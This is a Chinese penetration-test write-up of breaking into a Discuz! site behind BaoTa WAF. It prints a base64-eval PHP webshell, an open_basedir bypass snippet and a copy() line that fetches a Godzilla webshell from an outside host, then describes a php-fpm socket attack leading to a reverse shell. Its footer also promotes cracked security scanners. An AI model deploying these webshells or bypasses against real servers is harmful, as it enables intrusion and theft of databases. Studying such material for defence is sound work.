一次利用哥斯拉绕过宝塔WAF及disable_functions

admin 2022年5月3日01:03:19安全文章评论26 views1559字阅读5分11秒阅读模式

文章来源:先知社区(鼹鼠Yanshu)

原文地址:https://xz.aliyun.com/t/10996

CSDN地址:https://blog.csdn.net/weixin_45887311


0x01 前言

这次渗透的主站是一个Discuz!3.4的搭建法招piao网站, 配置有宝塔WAF

一次利用哥斯拉绕过宝塔WAF及disable_functions

Discuz!ML 3.X的漏洞进行攻击,但是没有成功

一次利用哥斯拉绕过宝塔WAF及disable_functions

发现主站外链会有一个发卡网,引导人们来这充值,是 某某发卡网,而且域名指向也是主站的ip,两个网站在同一个 ,此处忘记截图了

网上有通杀Payload,写shell的过程在这里省略了

一次利用哥斯拉绕过宝塔WAF及disable_functions

由于网站存在宝塔WAF ,写入Shell必须变形一下,将命令进行base64编码在传进去

<?php @eval(base64_decode($_POST['yanshu']));?>

一次利用哥斯拉绕过宝塔WAF及disable_functions

在phpinfo()里可以看到,宝塔默认会设置open_basedir以及disable_functions,导致蚁剑的shell直接连接之后不大好用,命令执行不了

0x02 绕过open_basedir查看文件

利用ini_set()Bypass open_basedir来获取路径名和目录内容,Base64编码之后执行,发现宝塔目录下还有其他站点目录

eval("mkdir('1');chdir('1');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(scandir('/www/wwwroot'));");

一次利用哥斯拉绕过宝塔WAF及disable_functions

0x03 哥斯拉管理webshell

为了方便查看文件 ,使用哥斯拉马,加密器选择PHP_EVAL_XOR_BASE64,用copy命令传到服务器中,这样流量就可以不会被宝塔waf拦截了

copy('http://xxxx/g.php','/www/wwwroot/xxx.com/g.php');

一次利用哥斯拉绕过宝塔WAF及disable_functions

哥斯拉马可以自动实现Bypass open_basedir,读取数据库用户名密码,可以更改管理员用户进后台或者脱库

一次利用哥斯拉绕过宝塔WAF及disable_functions

一次利用哥斯拉绕过宝塔WAF及disable_functions


0x04 绕过disable_functions执行命令

disable_functions禁用putenv()、mail() 、pcntl_exec()等函数,环境是php5.6,导致很多常规bypass的方法都用不了

一次利用哥斯拉绕过宝塔WAF及disable_functions

网站是使用nginx+php5.6,用攻击php-fpm的办法来bypass,攻击原理可以看参考链接先找到php-fpm的配置 如:/www/server/php/56/etc/php-fpm.conf或者看nginx的配置 ,得到php-fpm的位置unix:/tmp/php-cgi-56.sock

一次利用哥斯拉绕过宝塔WAF及disable_functions

首先选择PAttackFPM将模块加载并执行

一次利用哥斯拉绕过宝塔WAF及disable_functions

再利用哥斯拉马中bypass disable_functions的模块 ,成功执行命令

一次利用哥斯拉绕过宝塔WAF及disable_functions

获取反弹Shell,可以进一步尝试对主机进行提权了

一次利用哥斯拉绕过宝塔WAF及disable_functions

一次利用哥斯拉绕过宝塔WAF及disable_functions

往期推荐 

// 1

各种日常RedTeam项目笔记

// 2

HVV安全攻防学习指南

// 3

最新AppScan10.0.7.28150破解

最新AppScan10.0.7.28150破解

// 4

最新AWVS14.7.220425114破解

免责声明

利用本公众号雾晓安全所提供而造成的任何直接信息或直接的后果及损失,均由用户本人、公众号雾晓安全及作者为此不承担责任,否则造成任何传播请自行承担!如有打扰请告知,我们会立即解除并致叹。谢谢!

阅读更多原创技术文章,“阅读全文

原文始发于微信公众号(雾晓安全):一次利用哥斯拉绕过宝塔WAF及disable_functions

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月3日01:03:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  一次利用哥斯拉绕过宝塔WAF及disable_functions http://cn-sec.com/archives/961036.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: